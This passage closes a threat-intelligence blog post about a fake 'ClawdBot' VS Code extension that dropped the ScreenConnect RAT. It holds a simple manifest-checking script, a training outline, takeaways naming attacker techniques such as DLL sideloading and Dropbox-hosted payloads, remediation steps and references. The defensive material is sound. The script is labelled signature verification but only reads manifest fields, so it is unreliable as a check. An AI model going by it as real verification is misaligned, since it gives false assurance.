javascript// VS Code verifies signatures automatically // Additional manual verification: const crypto = require('crypto'); const fs = require('fs'); function verifyExtensionSignature(extensionPath) { const manifest = JSON.parse(fs.readFileSync(`${extensionPath}/package.json`)); // Check publisher const trustedPublishers = ['microsoft', 'ms-vscode', 'github']; if (!trustedPublishers.includes(manifest.publisher)) { console.warn(`⚠ Untrusted publisher: ${manifest.publisher}`); } // Check download count (popular = more vetted) if (manifest.statistics && manifest.statistics.install < 1000) { console.warn(`⚠ Low install count: ${manifest.statistics.install}`); } // Check for suspicious activation events if (manifest.activationEvents && manifest.activationEvents.includes('*')) { console.error(`✗ Suspicious: Activates on all events`); } }
10. Developer Security Training
text# Quarterly Security Training Topics ## Module 1: Supply Chain Attacks - IDE extension risks - NPM package typosquatting - Dependency confusion attacks ## Module 2: Credential Hygiene - Secret management best practices - Git commit hygiene - Token rotation procedures ## Module 3: Social Engineering - Brand impersonation (ClawdBot case study) - Phishing targeting developers - Malicious open source contributions ## Module 4: Incident Response - Recognizing compromise indicators - Immediate response steps - Escalation procedures
Key Takeaways
✅ VS Code extensions run with full user privileges and can execute arbitrary code with no permission prompts—making them high-value attack vectors[code.visualstudio]
✅ The ClawdBot attack demonstrates advanced sophistication with functional AI features, automatic activation, multi-layer redundancy, and legitimate software weaponizationkenhuangus.substack+1
✅ ScreenConnect RAT abuse is a growing trend where attackers deploy legitimate remote administration tools configured to connect to malicious infrastructure[acronis]
✅ Brand hijacking exploits user trust by claiming popular names before legitimate projects publish official extensionscypro+1
✅ Process camouflage is highly effective on developer workstations where processes named "Code.exe" appear completely normal[aikido]
✅ DLL sideloading provides payload redundancy ensuring delivery even if primary C2 infrastructure is taken down[aikido]
✅ Dropbox abuse for malware hosting bypasses many network security controls that allow trusted cloud storage providers[aikido]
✅ Credential theft from developer workstations grants attackers access to entire software supply chains and production infrastructure[cycode]
✅ Detection requires multi-layered approach combining file system monitoring, network analysis, process behavior, and YARA signatures[dev]
✅ Developer workstation hardening is essential including extension allowlisting, least privilege, EDR deployment, and secret management[isosecu]
✅ Rapid vendor response limits damage as Microsoft removed the extension within hours of Aikido Security's reportcheckmarx+1
✅ This attack pattern will evolve with future campaigns likely targeting other popular IDEs (JetBrains, Eclipse, Sublime) and developer tools
Your Next Steps
Audit VS Code extensions immediately - Review all installed extensions and remove any unfamiliar or untrusted ones
Deploy detection rules from this guide across your SIEM, EDR, and network monitoring platforms
Implement threat hunting using provided queries to identify potential historical compromises
Harden developer workstations following the best practices outlined (application control, EDR, secret management)
Establish extension policies creating allowlists of approved extensions and blocking unapproved installations
Rotate credentials preemptively if any developers installed the ClawdBot extension or similar suspicious tools
Train development teams on supply chain attack vectors and social engineering targeting developers
Monitor threat intelligence - Follow @cyberhawkintel for updates on emerging IDE-based threats
Test incident response - Run tabletop exercises simulating developer workstation compromises
Share IOCs with community - Contribute findings to threat intelligence platforms (MISP, AlienVault OTX)
References
Aikido Security - Fake ClawdBot VS Code Extension Installs ScreenConnect RAT - https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-malware
SOC Prime - Fake VS Code Extension Installs ScreenConnect RAT - https://socprime.com/active-threats/fake-clowdbot-vs-code-extension-drops-screenconnect-rat/
Vectra AI - From Clawdbot to OpenClaw: When Automation Becomes a Digital Backdoor - https://www.vectra.ai/blog/clawdbot-to-moltbot-to-openclaw-when-automation-becomes-a-digital-backdoor
ReversingLabs - Fake VS Code Coding Assistant Drops Malware - https://www.linkedin.com/pulse/fake-vs-code-coding-assistant-drops-malware-reversinglabs-1di8e
Acronis TRU - Trojanized ScreenConnect Installers Evolve - https://www.acronis.com/en/tru/posts/trojanized-screenconnect-installers-evolve-dropping-multiple-rats-on-a-single-machine/
Checkmarx - How We Take Down Malicious Visual Studio Code Extensions - https://checkmarx.com/zero-post/how-we-take-down-malicious-visual-studio-code-extensions/
VS Code - Extension Runtime Security Documentation - https://code.visualstudio.com/docs/configure/extensions/extension-runtime-security
Cycode - Token Security Risks in VS Code Explained - https://cycode.com/blog/exposing-vscode-secrets/
Snyk - Top 5 VS Code Extensions for Security - https://snyk.io/blog/top-5-vs-code-extensions-security/
ISOSecu - Hardening Developer Workstations - https://isosecu.com/blog/hardening-developers-workstation
#cyberhawkthreatintel #cyberhawkconsultancy #cyberhawkk
6. Tags
VS Code malware, ClawdBot trojan, ScreenConnect RAT, IDE security, developer workstation security, supply chain attack, extension malware, DLL sideloading, threat hunting, incident response, malware analysis, YARA rules, EDR detection, SIEM alerts, developer security, workstation hardening, credential theft, remote access trojan, C2 infrastructure, threat intelligence, cyber forensics, SOC analysis, malware remediation, endpoint security
7. YouTube Video URL
(Leave blank unless you have a specific video)
Comments
Post a Comment